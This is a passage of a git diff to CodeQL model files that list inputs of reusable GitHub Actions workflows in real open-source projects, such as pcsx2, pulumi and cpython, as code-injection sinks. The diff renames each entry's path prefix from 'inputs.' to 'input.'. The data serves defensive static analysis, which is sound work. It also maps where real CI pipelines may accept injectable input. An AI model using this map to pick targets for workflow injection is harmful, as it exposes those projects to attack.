a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] - - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "inputs.package_version", "code-injection", "generated"] \ No newline at end of file + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "input.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "input.package_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 0f4ad0a7ca70..c694d3953f63 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index c38ae9258600..9ecf401cab50 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.http-client", "code-injection", "generated"] - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.kube-version", "code-injection", "generated"] - - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.java-version", "code-injection", "generated"] \ No newline at end of file + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index fd4697ac1c43..19fee627702a 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "inputs.new_version", "code-injection", "generated"] \ No newline at end of file + - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 90c4c20b5857..4eb201001e14 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "inputs.release-version", "code-injection", "generated"] - - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file + - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] + - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 51d99171a541..94c7292b655e 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "inputs.release-command", "code-injection", "generated"] \ No newline at end of file + - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index 8e74c9b811d4..6088ffcd7023 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "inputs.build_configuration", "code-injection", "generated"] \ No newline at end of file + - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index cd7de6d57866..05c4dc8ddf37 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.configuration", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.cmakeFlags", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] \ No newline at end of file + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.cmakeFlags", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "input.patchesUrl", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index ecea4012c75c..affc12cdc4ad 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.pytest_test_directory", "code-injection", "generated"] - - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.job_name", "code-injection", "generated"] - - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "inputs.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "input.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index f8ee5402a92f..b1c4d2f2cbfd 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "inputs.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file + - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index aa76014db324..4ccbd71f8c36 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.tags", "code-injection", "generated"] - - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.suites", "code-injection", "generated"] - - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "inputs.image-base-name", "code-injection", "generated"] \ No newline at end of file + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "input.image-base-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index e52ce3c8318f..2eb2104b542a 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file + - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index 31f24a27268a..fee958600308 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.os", "code-injection", "generated"] - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.product", "code-injection", "generated"] - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.is_release", "code-injection", "generated"] \ No newline at end of file + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.is_release", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index 4ace66c79c31..49a98d4dda55 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.benchmark", "code-injection", "generated"] - - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.trace", "code-injection", "generated"] \ No newline at end of file + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index 44518d6a348f..aa432107a0d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index c0edbfae484c..40053c68c1a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "inputs.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file + - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index a28ffce30f73..645ec756783f 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.ent-public-key", "code-injection", "generated"] - - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.build-config-path", "code-injection", "generated"] \ No newline at end of file + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index afe2daa172ee..3d80594c0d5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["prql/prql/.github/workflows/test-rust.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index a07044c0ccc3..e542d409efe8 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-command", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-name", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "inputs.version", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "input.version", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.arch", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 250307e3acdb..5ebf7426d167 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "inputs.ignore_dependency_check", "code-injection", "generated"] - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "inputs.debug", "code-injection", "generated"] - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "inputs.flags", "code-injection", "generated"] \ No newline at end of file + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "input.flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index e968f2097065..c5630248f7f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "inputs.manifest-dir", "code-injection", "generated"] \ No newline at end of file + - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 438f637a9a09..4ea93f374b3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyo3/pyo3/.github/workflows/build.yml", "*", "inputs.extra-features", "code-injection", "generated"] \ No newline at end of file + - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 7e7b82b25f52..d702e7ad830a 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "inputs.options", "code-injection", "generated"] - - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file + - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] + - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index e3c3b19e4413..baba2fc1e150 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file + - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index 704adb3f121b..feb68c4bdd74 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pytorch/xla/.github/workflows/_test.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file + - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index 5300a7d145e1..d3b779c1afa2 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "inputs.buckets", "code-injection", "generated"] \ No newline at end of file + - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index f82254bd22b6..6b0e733be176 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.tagged_release", "code-injection", "generated"] - - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.tagged_release", "code-injection", "generated"] - - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.registry_target", "code-injection", "generated"] \ No newline at end of file + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.registry_target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index 80a26a9e65fb..cf9971e85246 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "inputs.gdal_ref", "code-injection", "generated"] \ No newline at end of file + - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index eb5e7835565f..b3518a7a8eed 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file + - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index cd2629f49bcf..a60fba237ef1 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["remix-run/remix/.github/workflows/stacks.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 77ad5d6a6d35..37f2febb70f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "inputs.version_override", "code-injection", "generated"] - - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.architecture", "code-injection", "generated"] - - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.OS", "code-injection", "generated"] - - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.version_override", "code-injection", "generated"] \ No newline at end of file + - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.OS", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.version_override", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index a881a1a5fd3e..6e3d48dbf89c 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ 